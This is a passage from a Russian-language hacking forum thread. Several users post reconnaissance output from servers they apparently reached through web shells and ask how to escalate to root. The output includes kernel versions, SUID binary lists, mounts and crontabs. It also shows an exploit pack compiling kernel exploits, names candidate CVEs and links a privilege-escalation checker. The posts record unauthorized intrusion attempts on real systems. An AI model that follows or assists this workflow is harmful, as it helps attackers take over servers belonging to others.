    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwx------   1 root root  317 Dec 23  2014 nginx-log-rotate
    Code:
    total 20
    drwxr-xr-x   2 root root 4096 Nov 14  2011 .
    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwxr-xr-x   1 root root 1281 Sep 28  2010 acct
    -rwx------   1 root root  270 Mar  1  2011 rm_old_cronjobs.sh
    Code:
    total 24
    drwxr-xr-x   2 root root 4096 Nov 14  2011 .
    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwxr-xr-x   1 root root  895 Jan  3  2011 man-db
    -rwxr-xr-x   1 root root 1784 Apr  6  2010 rkhunter
    -rwxr-xr-x   1 root root 1133 Sep 10  2010 sysklogd
    GCC присутствует, но права на него отсутствуют
    Пробовал использовать enlightenment из шапки, результат вот:
    Code:
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...OK.
    Compiling exp_wunderbar.c...OK.
    ./run_null_exploits.sh: line 61: /usr/bin/gcc: Permission denied
    ./run_null_exploits.sh: line 63: ./pwnkernel: No such file or directory
     
  6. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
     
    _________________________
  7. 1024

    1024 New Member

    Joined:
    21 Jul 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ну, спасайте, господа товарищи олдфаги.
    Code:
    uname -a :
    Linux admin-server 2.6.32-43-generic-pae #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 i686 GNU/Linux
    ls -la /boot :
    total 20016
    drwxr-xr-x  3 root root     4096 Oct  9  2012 .
    drwxr-xr-x 22 root root     4096 Jul 18 15:20 ..
    -rw-r--r--  1 root root  1735360 Sep  6  2012 System.map-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   656323 Sep  6  2012 abi-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   116469 Sep  6  2012 config-2.6.32-43-generic-pae
    drwxr-xr-x  3 root root     4096 Oct  8  2012 grub
    -rw-r--r--  1 root root 13612578 Oct  9  2012 initrd.img-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   160280 Mar 23  2010 memtest86+.bin
    -rw-r--r--  1 root root     1200 Sep  6  2012 vmcoreinfo-2.6.32-43-generic-pae
    -rw-r--r--  1 root root  4183264 Sep  6  2012 vmlinuz-2.6.32-43-generic-pae
    lls -la --full-time /lib :
    (пусто)
    mount :
    /dev/sda1 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    none on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    none on /dev type devtmpfs (rw,mode=0755)
    none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    none on /dev/shm type tmpfs (rw,nosuid,nodev)
    none on /var/run type tmpfs (rw,nosuid,mode=0755)
    none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
    none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    gvfs-fuse-daemon on /home/administrator/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=administrator)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
    /dev/fuse on /tmp/exploit||/tmp/exploit type fuse (rw,nosuid,nodev,user=www-data)
    /dev/fuse on /tmp/_ type fuse (rw,nosuid,nodev,user=www-data)
    df -h :
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/sda1             231G   18G  202G   8% /
    none                  1.9G  280K  1.9G   1% /dev
    none                  1.9G  432K  1.9G   1% /dev/shm
    none                  1.9G  116K  1.9G   1% /var/run
    none                  1.9G     0  1.9G   0% /var/lock
    none                  1.9G     0  1.9G   0% /lib/init/rw
    cat /etc/issue :
    Ubuntu 10.04.4 LTS \n \l
    кронтаб: см.далее
    cat /proc/version :
    Linux version 2.6.32-43-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012
    cat /proc/sys/vm/mmap_min_addr :
    65536
    pwd :
    /var/www/login_bak/style ( drwxr----- )[/B]
    [LIST][*]ls -la /usr/bin/staprun :
    (пусто)
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null :
    -rwsr-xr-x 1 root root 9724 Feb 19  2010 /sbin/mount.ecryptfs_private
    -rwsr-xr-- 1 root dip 273312 Mar  7  2010 /usr/sbin/pppd
    -rwsr-sr-x 1 libuuid libuuid 13848 Jan 21  2011 /usr/sbin/uuidd
    -rwsr-xr-x 1 root root 18056 Apr 20  2011 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 127668 Jan 20  2011 /usr/bin/sudo
    -rwsr-sr-x 1 root root 9672 Jan 19  2012 /usr/bin/X
    -rwsr-xr-x 1 root lpadmin 13540 Sep 12  2011 /usr/bin/lppasswd
    -rwsr-xr-x 1 root root 127668 Jan 20  2011 /usr/bin/sudoedit
    -rwsr-sr-x 1 daemon daemon 42752 Jan 15  2011 /usr/bin/at
    -rwsr-xr-x 1 root root 52092 Mar  7  2010 /usr/bin/mtr
    -rwsr-xr-x 1 root root 26356 Feb  2  2010 /usr/bin/fping
    -rwsr-xr-x 1 root root 53812 Feb 15  2011 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 13820 Mar 12  2010 /usr/bin/arping
    -rwsr-xr-x 1 root root 37140 Feb 15  2011 /usr/bin/passwd
    -rwsr-xr-x 1 root root 13952 Mar 12  2010 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root 31700 Feb 15  2011 /usr/bin/chsh
    -rwsr-xr-x 1 root root 26388 Feb  2  2010 /usr/bin/fping6
    -rwsr-xr-x 1 root root 26784 Feb 15  2011 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 36180 Feb 15  2011 /usr/bin/chfn
    -rwsr-xr-x 1 root root 5548 Nov 10  2009 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 9720 Apr 20  2011 /usr/lib/policykit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 9676 Jan 22  2011 /usr/lib/pt_chown
    -rwsr-xr-x 1 root root 13780 Apr 18  2010 /usr/lib/chromium-browser/chromium-browser-sandbox
    -rwsr-xr-x 1 root root 182464 Jun 17  2011 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 11019 Nov 21  2009 /usr/lib/kde4/libexec/fileshareset
    -rwsr-xr-x 1 root root 26456 Mar 12  2010 /bin/ping6
    -rwsr-xr-x 1 root root 72188 Jan 21  2011 /bin/mount
    -rwsr-xr-x 1 root root 31100 Feb 15  2011 /bin/su
    -rwsr-xr-x 1 root root 34756 Mar 12  2010 /bin/ping
    -rwsr-xr-x 1 root root 26244 Feb 12  2011 /bin/fusermount
    -rwsr-xr-x 1 root root 51224 Jan 21  2011 /bin/umount
    -rwsr-xr-- 1 root messagebus 42492 Jul 23  2011 /lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 14024 Apr  6  2013 /opt/google/chrome/chrome-sandbox
    -rwsr-sr-x 1 root root 3676623 Jan 10  2010 /opt/AutoScan/bin/autoscan-network-daemon
    
    [/LIST]
    
    linuxprivchecker.py:
    http://my-files.ru/zf4cbx
    Опробованы все эксплоиты из linuxprivchecker, компилятся почти все, не отрабатывает ни один (без ошибок,просто нет результата). Из того, что в чекере нет: система должна быть подвержена CVE 2014-0196 и 2014-3153, но под первый нет эксплоита на мою версию ядра, эксплоит под вторую не работает.
    Нарыл две уязвимости этого года, но одна неюзабельна из-за отличающейся версии ОС, вторую (2015-3202) нет возможности проверить (чтобы узнать, сработало или нет, надо ждать логина в систему из-под рута. С таким админом его можно ждать вечно...).
    Хелп.
     
    #587 1024, 21 Jul 2015
    Last edited: 21 Jul 2015
  8. andrman

    andrman New Member

    Joined:
    31 Jul 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста по этому серверу
    Code:
    ***********uname -a
    Linux 2.6.32-431.29.2.el6.x86_64 #1 SMP Sun Jul 27 15:55:46 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux
    **********ls -la /boot
    total 80526
    dr-xr-xr-x.  5 root root     3072 Jul 31 04:15 .
    dr-xr-xr-x. 29 root root     4096 Jul 31 01:05 ..
    -rw-r--r--   1 root root      171 Jul 27  2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
    -rw-r--r--   1 root root      171 Mar 10 17:05 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac
    -rw-r--r--   1 root root      171 May 29 10:21 .vmlinuz-2.6.32-504.23.4.el6.x86_64.hmac
    -rw-r--r--   1 root root  2519815 Jul 27  2014 System.map-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--   1 root root  2545609 Mar 10 17:05 System.map-2.6.32-504.16.2.el6.x86_64
    -rw-r--r--   1 root root  2545975 May 29 10:21 System.map-2.6.32-504.23.4.el6.x86_64
    -rw-r--r--   1 root root   105200 Jul 27  2014 config-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--   1 root root   106313 Mar 10 17:05 config-2.6.32-504.16.2.el6.x86_64
    -rw-r--r--   1 root root   106371 May 29 10:21 config-2.6.32-504.23.4.el6.x86_64
    drwxr-xr-x.  3 root root     1024 Oct 25  2013 efi
    drwxr-xr-x.  2 root root     1024 Jul 21 01:48 grub
    -rw-------   1 root root 17153340 Nov  6  2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
    -rw-------   1 root root 19351653 Jun 10 03:45 initramfs-2.6.32-504.16.2.el6.x86_64.img
    -rw-------   1 root root 19354839 Jul 21 01:48 initramfs-2.6.32-504.23.4.el6.x86_64.img
    -rw-------   1 root root  5598321 Apr 28 02:44 initrd-2.6.32-431.29.2.el6.x86_64kdump.img
    drwx------.  2 root root    12288 Oct 25  2013 lost+found
    -rw-r--r--   1 root root   193945 Jul 27  2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
    -rw-r--r--   1 root root   200317 Mar 10 17:06 symvers-2.6.32-504.16.2.el6.x86_64.gz
    -rw-r--r--   1 root root   200210 May 29 10:22 symvers-2.6.32-504.23.4.el6.x86_64.gz
    -rwxr-xr-x   1 root root  4132336 Jul 27  2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
    -rwxr-xr-x   1 root root  4153296 Mar 10 17:05 vmlinuz-2.6.32-504.16.2.el6.x86_64
    -rwxr-xr-x   1 root root  4154992 May 29 10:21 vmlinuz-2.6.32-504.23.4.el6.x86_64
    ***************lls -la --full-time /lib
    sh: lls: command not found
    *********************ls -la --full-time /lib
    total 3760
    dr-xr-xr-x. 13 root root    4096 2015-07-21 01:47:08.711114108 -0400 .
    dr-xr-xr-x. 29 root root    4096 2015-07-31 01:05:31.931316783 -0400 ..
    drwxr-xr-x.  3 root root    4096 2015-01-12 08:24:24.000000000 -0500 alsa
    lrwxrwxrwx   1 root root      14 2015-01-22 01:39:24.006519825 -0500 cpp -> ../usr/bin/cpp
    drwxr-xr-x.  3 root root    4096 2015-01-22 01:41:16.608712599 -0500 crda
    drwxr-xr-x. 44 root root   12288 2015-07-21 01:45:25.921755167 -0400 firmware
    drwxr-xr-x.  3 root root    4096 2015-05-20 16:46:40.000000000 -0400 i686
    drwxr-xr-x.  6 root root    4096 2013-10-25 03:57:52.000000000 -0400 kbd
    -rwxr-xr-x   1 root root  141140 2015-05-20 17:12:39.000000000 -0400 ld-2.12.so
    lrwxrwxrwx   1 root root      10 2015-07-21 01:47:08.518117237 -0400 ld-linux.so.2 -> ld-2.12.so
    -rwxr-xr-x   1 root root    7220 2015-05-20 17:12:36.000000000 -0400 libBrokenLocale-2.12.so
    lrwxrwxrwx   1 root root      23 2015-07-21 01:47:08.519117221 -0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    -rwxr-xr-x   1 root root   20372 2015-05-20 17:12:40.000000000 -0400 libSegFault.so
    -rwxr-xr-x   1 root root   13412 2015-05-20 17:12:39.000000000 -0400 libanl-2.12.so
    lrwxrwxrwx   1 root root      14 2015-07-21 01:47:08.521117189 -0400 libanl.so.1 -> libanl-2.12.so
    -rwxr-xr-x   1 root root 1902892 2015-05-20 17:12:38.000000000 -0400 libc-2.12.so
    lrwxrwxrwx   1 root root      12 2015-07-21 01:47:08.641115242 -0400 libc.so.6 -> libc-2.12.so
    -rwxr-xr-x   1 root root  190988 2015-05-20 17:12:37.000000000 -0400 libcidn-2.12.so
    lrwxrwxrwx   1 root root      15 2015-07-21 01:47:08.651115080 -0400 libcidn.so.1 -> libcidn-2.12.so
    -rwxr-xr-x   1 root root   38376 2015-05-20 17:12:40.000000000 -0400 libcrypt-2.12.so
    lrwxrwxrwx   1 root root      16 2015-07-21 01:47:08.653115048 -0400 libcrypt.so.1 -> libcrypt-2.12.so
    -rwxr-xr-x   1 root root   17892 2015-05-20 17:12:37.000000000 -0400 libdl-2.12.so
    lrwxrwxrwx   1 root root      13 2015-07-21 01:47:08.655115016 -0400 libdl.so.2 -> libdl-2.12.so
    -rw-r--r--   1 root root     899 2015-01-28 17:12:07.000000000 -0500 libfreebl3.chk
    -rwxr-xr-x   1 root root    9604 2015-01-28 17:12:06.000000000 -0500 libfreebl3.so
    -rw-r--r--   1 root root     899 2015-01-28 17:12:07.000000000 -0500 libfreeblpriv3.chk
    -rwxr-xr-x   1 root root  378504 2015-01-28 17:12:06.000000000 -0500 libfreeblpriv3.so
    -rwxr-xr-x   1 root root  120672 2014-09-01 09:11:34.000000000 -0400 libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx   1 root root      28 2015-01-22 01:41:30.798484873 -0500 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
    -rwxr-xr-x   1 root root  200024 2015-05-20 17:12:36.000000000 -0400 libm-2.12.so
    lrwxrwxrwx   1 root root      12 2015-07-21 01:47:08.667114822 -0400 libm.so.6 -> libm-2.12.so
    -rwxr-xr-x   1 root root  113908 2015-05-20 17:12:39.000000000 -0400 libnsl-2.12.so
    lrwxrwxrwx   1 root root      14 2015-07-21 01:47:08.674114708 -0400 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x   1 root root   40196 2015-05-20 17:12:35.000000000 -0400 libnss_compat-2.12.so
    lrwxrwxrwx   1 root root      21 2015-07-21 01:47:08.677114659 -0400 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x   1 root root   25592 2015-05-20 17:12:40.000000000 -0400 libnss_dns-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.679114626 -0400 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x   1 root root   58704 2015-05-20 17:12:40.000000000 -0400 libnss_files-2.12.so
    lrwxrwxrwx   1 root root      20 2015-07-21 01:47:08.682114578 -0400 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x   1 root root   22136 2015-05-20 17:12:37.000000000 -0400 libnss_hesiod-2.12.so
    lrwxrwxrwx   1 root root      21 2015-07-21 01:47:08.684114546 -0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x   1 root root   49708 2015-05-20 17:12:37.000000000 -0400 libnss_nis-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.687114497 -0400 libnss_nis.so.2 -> libnss_nis-2.12.so
    -rwxr-xr-x   1 root root   58708 2015-05-20 17:12:38.000000000 -0400 libnss_nisplus-2.12.so
    lrwxrwxrwx   1 root root      22 2015-07-21 01:47:08.690114448 -0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    -rwxr-xr-x   1 root root  131220 2015-05-20 17:12:35.000000000 -0400 libpthread-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.698114318 -0400 libpthread.so.0 -> libpthread-2.12.so
    -rwxr-xr-x   1 root root  103384 2015-05-20 17:12:39.000000000 -0400 libresolv-2.12.so
    lrwxrwxrwx   1 root root      17 2015-07-21 01:47:08.705114205 -0400 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x   1 root root   39708 2015-05-20 17:12:36.000000000 -0400 librt-2.12.so
    lrwxrwxrwx   1 root root      13 2015-07-21 01:47:08.708114156 -0400 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x   1 root root   31616 2015-05-20 17:12:41.000000000 -0400 libthread_db-1.0.so
    lrwxrwxrwx   1 root root      19 2015-07-21 01:47:08.710114124 -0400 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x   1 root root   12788 2015-05-20 17:12:40.000000000 -0400 libutil-2.12.so
    lrwxrwxrwx   1 root root      15 2015-07-21 01:47:08.710114124 -0400 libutil.so.1 -> libutil-2.12.so
    drwxr-xr-x.  2 root root    4096 2013-10-25 13:09:41.000000000 -0400 lsb
    dr-xr-xr-x.  5 root root    4096 2015-07-21 01:47:10.410086560 -0400 modules
    drwxr-xr-x.  3 root root    4096 2015-07-21 01:47:08.730113800 -0400 rtkaio
    drwxr-xr-x.  2 root root    4096 2014-07-17 11:36:23.000000000 -0400 security
    drwxr-xr-x.  6 root root    4096 2013-10-25 03:57:01.000000000 -0400 terminfo
    drwxr-xr-x.  5 root root    4096 2015-01-22 01:39:34.385353241 -0500 udev
    ********************mount
    /dev/mapper/VolGroup-lv_root on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /etc/named on /var/named/chroot/etc/named type none (rw,bind)
    /var/named on /var/named/chroot/var/named type none (rw,bind)
    /usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)
    *************************df -h
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/mapper/VolGroup-lv_root
                          909G  587G  276G  69% /
    tmpfs                  16G  1.1G   15G   7% /dev/shm
    /dev/sda1             243M   86M  145M  38% /boot
    sh-4.1$ cat /etc/issue
    cat /etc/issue
    Red Hat Enterprise Linux Server release 6.6 (Santiago)
    Kernel \r on an \m
    *******************cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    
    ****************ls -la cron.d
    ls: cannot access cron.d: No such file or directory
    *************ls -la cron.hourly
    ls: cannot access cron.hourly: No such file or directory
    **********************ls -la cron.monthly
    ls: cannot access cron.monthly: No such file or directory
    ********************ls -la cron.weekly
    ls: cannot access cron.weekly: No such file or directory
    ******************cat /proc/version
    Linux version 2.6.32-431.29.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Sun Jul 27 15:55:46 EDT 2014
    ******************cat /proc/sys/vm/mmap_min_addr
    4096
    sh-4.1$ pwd
    pwd
    /var/www/vhost//httpdoc/lib
    ************ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 Jun 23  2014 /usr/bin/staprun
    ******************
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/nul
    sh: /dev/nul: Permission denied
    
     
  9. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Подскажите пожалуйста, можно ли рутить этот сервер?
    $ uname -a 2>&1
    Code:
    Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot 2>&1
    Code:
    total 652860
    drwxr-xr-x  3 root root    12288 Jun 20 08:15 .
    drwxr-xr-x 24 root root     4096 Jun 16 08:07 ..
    -rw-------  1 root root  3372643 May  3  2014 System.map-3.13.0-24-generic
    -rw-------  1 root root  3378267 Jun  5  2014 System.map-3.13.0-29-generic
    -rw-------  1 root root  3378641 Jul  5  2014 System.map-3.13.0-30-generic
    -rw-------  1 root root  3381262 Jul 15  2014 System.map-3.13.0-32-generic
    -rw-------  1 root root  3381262 Jul 29  2014 System.map-3.13.0-33-generic
    -rw-------  1 root root  3381262 Aug 13  2014 System.map-3.13.0-34-generic
    -rw-------  1 root root  3386444 Aug 15  2014 System.map-3.13.0-35-generic
    -rw-------  1 root root  3386479 Sep  4  2014 System.map-3.13.0-36-generic
    -rw-------  1 root root  3386945 Sep 23  2014 System.map-3.13.0-37-generic
    -rw-------  1 root root  3386936 Oct 28  2014 System.map-3.13.0-39-generic
    -rw-------  1 root root  3387231 Nov 13  2014 System.map-3.13.0-40-generic
    -rw-------  1 root root  3388792 Nov 25  2014 System.map-3.13.0-41-generic
    -rw-------  1 root root  3388760 Dec  9  2014 System.map-3.13.0-43-generic
    -rw-------  1 root root  3388834 Dec 16  2014 System.map-3.13.0-44-generic
    -rw-------  1 root root  3389458 Mar 11 01:43 System.map-3.13.0-46-generic
    -rw-------  1 root root  3389235 Mar 12 16:52 System.map-3.13.0-48-generic
    -rw-------  1 root root  3389437 Apr 11 02:05 System.map-3.13.0-49-generic
    -rw-------  1 root root  3389875 Apr 15 18:03 System.map-3.13.0-51-generic
    -rw-------  1 root root  3389875 May  4 10:09 System.map-3.13.0-52-generic
    -rw-------  1 root root  3390132 May 20 16:11 System.map-3.13.0-53-generic
    -rw-------  1 root root  3390881 May 27 01:11 System.map-3.13.0-54-generic
    -rw-------  1 root root  3390881 Jun 18 06:03 System.map-3.13.0-55-generic
    -rw-r--r--  1 root root  1158016 May  3  2014 abi-3.13.0-24-generic
    -rw-r--r--  1 root root  1161764 Jun  5  2014 abi-3.13.0-29-generic
    -rw-r--r--  1 root root  1162257 Jul  5  2014 abi-3.13.0-30-generic
    -rw-r--r--  1 root root  1162712 Jul 15  2014 abi-3.13.0-32-generic
    -rw-r--r--  1 root root  1162712 Jul 29  2014 abi-3.13.0-33-generic
    -rw-r--r--  1 root root  1162712 Aug 13  2014 abi-3.13.0-34-generic
    -rw-r--r--  1 root root  1163858 Aug 15  2014 abi-3.13.0-35-generic
    -rw-r--r--  1 root root  1163858 Sep  4  2014 abi-3.13.0-36-generic
    -rw-r--r--  1 root root  1164489 Sep 23  2014 abi-3.13.0-37-generic
    -rw-r--r--  1 root root  1164547 Oct 28  2014 abi-3.13.0-39-generic
    -rw-r--r--  1 root root  1164509 Nov 13  2014 abi-3.13.0-40-generic
    -rw-r--r--  1 root root  1164720 Nov 25  2014 abi-3.13.0-41-generic
    -rw-r--r--  1 root root  1164720 Dec  9  2014 abi-3.13.0-43-generic
    -rw-r--r--  1 root root  1164720 Dec 16  2014 abi-3.13.0-44-generic
    -rw-r--r--  1 root root  1164852 Mar 11 01:43 abi-3.13.0-46-generic
    -rw-r--r--  1 root root  1164723 Mar 12 16:52 abi-3.13.0-48-generic
    -rw-r--r--  1 root root  1164723 Apr 11 02:05 abi-3.13.0-49-generic
    -rw-r--r--  1 root root  1164671 Apr 15 18:03 abi-3.13.0-51-generic
    -rw-r--r--  1 root root  1164671 May  4 10:09 abi-3.13.0-52-generic
    -rw-r--r--  1 root root  1164671 May 20 16:11 abi-3.13.0-53-generic
    -rw-r--r--  1 root root  1164806 May 27 01:11 abi-3.13.0-54-generic
    -rw-r--r--  1 root root  1164806 Jun 18 06:03 abi-3.13.0-55-generic
    -rw-r--r--  1 root root   165510 May  3  2014 config-3.13.0-24-generic
    -rw-r--r--  1 root root   165544 Jun  5  2014 config-3.13.0-29-generic
    -rw-r--r--  1 root root   165576 Jul  5  2014 config-3.13.0-30-generic
    -rw-r--r--  1 root root   165611 Jul 15  2014 config-3.13.0-32-generic
    -rw-r--r--  1 root root   165611 Jul 29  2014 config-3.13.0-33-generic
    -rw-r--r--  1 root root   165611 Aug 13  2014 config-3.13.0-34-generic
    -rw-r--r--  1 root root   165652 Aug 15  2014 config-3.13.0-35-generic
    -rw-r--r--  1 root root   165671 Sep  4  2014 config-3.13.0-36-generic
    -rw-r--r--  1 root root   165712 Sep 23  2014 config-3.13.0-37-generic
    -rw-r--r--  1 root root   165712 Oct 28  2014 config-3.13.0-39-generic
    -rw-r--r--  1 root root   165745 Nov 13  2014 config-3.13.0-40-generic
    -rw-r--r--  1 root root   165745 Nov 25  2014 config-3.13.0-41-generic
    -rw-r--r--  1 root root   165745 Dec  9  2014 config-3.13.0-43-generic
    -rw-r--r--  1 root root   165748 Dec 16  2014 config-3.13.0-44-generic
    -rw-r--r--  1 root root   165748 Mar 11 01:43 config-3.13.0-46-generic
    -rw-r--r--  1 root root   165773 Mar 12 16:52 config-3.13.0-48-generic
    -rw-r--r--  1 root root   165773 Apr 11 02:05 config-3.13.0-49-generic
    -rw-r--r--  1 root root   165762 Apr 15 18:03 config-3.13.0-51-generic
    -rw-r--r--  1 root root   165762 May  4 10:09 config-3.13.0-52-generic
    -rw-r--r--  1 root root   165762 May 20 16:11 config-3.13.0-53-generic
    -rw-r--r--  1 root root   165762 May 27 01:11 config-3.13.0-54-generic
    -rw-r--r--  1 root root   165762 Jun 18 06:03 config-3.13.0-55-generic
    drwxr-xr-x  5 root root     4096 Jun 20 08:15 grub
    -rw-r--r--  1 root root 19692919 Jun 25  2014 initrd.img-3.13.0-24-generic
    -rw-r--r--  1 root root 19693496 Jun 25  2014 initrd.img-3.13.0-29-generic
    -rw-r--r--  1 root root 19802843 Jul 10  2014 initrd.img-3.13.0-30-generic
    -rw-r--r--  1 root root 19805892 Jul 30  2014 initrd.img-3.13.0-32-generic
    -rw-r--r--  1 root root 19806330 Aug 12  2014 initrd.img-3.13.0-33-generic
    -rw-r--r--  1 root root 19807084 Aug 14  2014 initrd.img-3.13.0-34-generic
    -rw-r--r--  1 root root 19814700 Aug 29  2014 initrd.img-3.13.0-35-generic
    -rw-r--r--  1 root root 19827146 Sep 23  2014 initrd.img-3.13.0-36-generic
    -rw-r--r--  1 root root 19826914 Oct  9  2014 initrd.img-3.13.0-37-generic
    -rw-r--r--  1 root root 19826798 Oct 30  2014 initrd.img-3.13.0-39-generic
    -rw-r--r--  1 root root 19831562 Nov 25  2014 initrd.img-3.13.0-40-generic
    -rw-r--r--  1 root root 19857194 Dec 11  2014 initrd.img-3.13.0-41-generic
    -rw-r--r--  1 root root 19858798 Dec 12  2014 initrd.img-3.13.0-43-generic
    -rw-r--r--  1 root root 19860064 Jan 13  2015 initrd.img-3.13.0-44-generic
    -rw-r--r--  1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
    -rw-r--r--  1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
    -rw-r--r--  1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
    -rw-r--r--  1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
    -rw-r--r--  1 root root 19865264 May  7 08:07 initrd.img-3.13.0-52-generic
    -rw-r--r--  1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
    -rw-r--r--  1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
    -rw-r--r--  1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
    -rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
    -rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
    -rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
    -rw-------  1 root root  5776416 May  3  2014 vmlinuz-3.13.0-24-generic
    -rw-------  1 root root  5792544 Jun  5  2014 vmlinuz-3.13.0-29-generic
    -rw-------  1 root root  5792608 Jul  5  2014 vmlinuz-3.13.0-30-generic
    -rw-------  1 root root  5798112 Jul 15  2014 vmlinuz-3.13.0-32-generic
    -rw-------  1 root root  5798688 Jul 29  2014 vmlinuz-3.13.0-33-generic
    -rw-------  1 root root  5797728 Aug 13  2014 vmlinuz-3.13.0-34-generic
    -rw-------  1 root root  5806368 Aug 15  2014 vmlinuz-3.13.0-35-generic
    -rw-------  1 root root  5806848 Sep  4  2014 vmlinuz-3.13.0-36-generic
    -rw-------  1 root root  5808832 Sep 23  2014 vmlinuz-3.13.0-37-generic
    -rw-------  1 root root  5808544 Oct 28  2014 vmlinuz-3.13.0-39-generic
    -rw-------  1 root root  5808960 Nov 13  2014 vmlinuz-3.13.0-40-generic
    -rw-------  1 root root  5814112 Nov 25  2014 vmlinuz-3.13.0-41-generic
    -rw-------  1 root root  5814080 Dec  9  2014 vmlinuz-3.13.0-43-generic
    -rw-------  1 root root  5814496 Dec 16  2014 vmlinuz-3.13.0-44-generic
    -rw-------  1 root root  5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
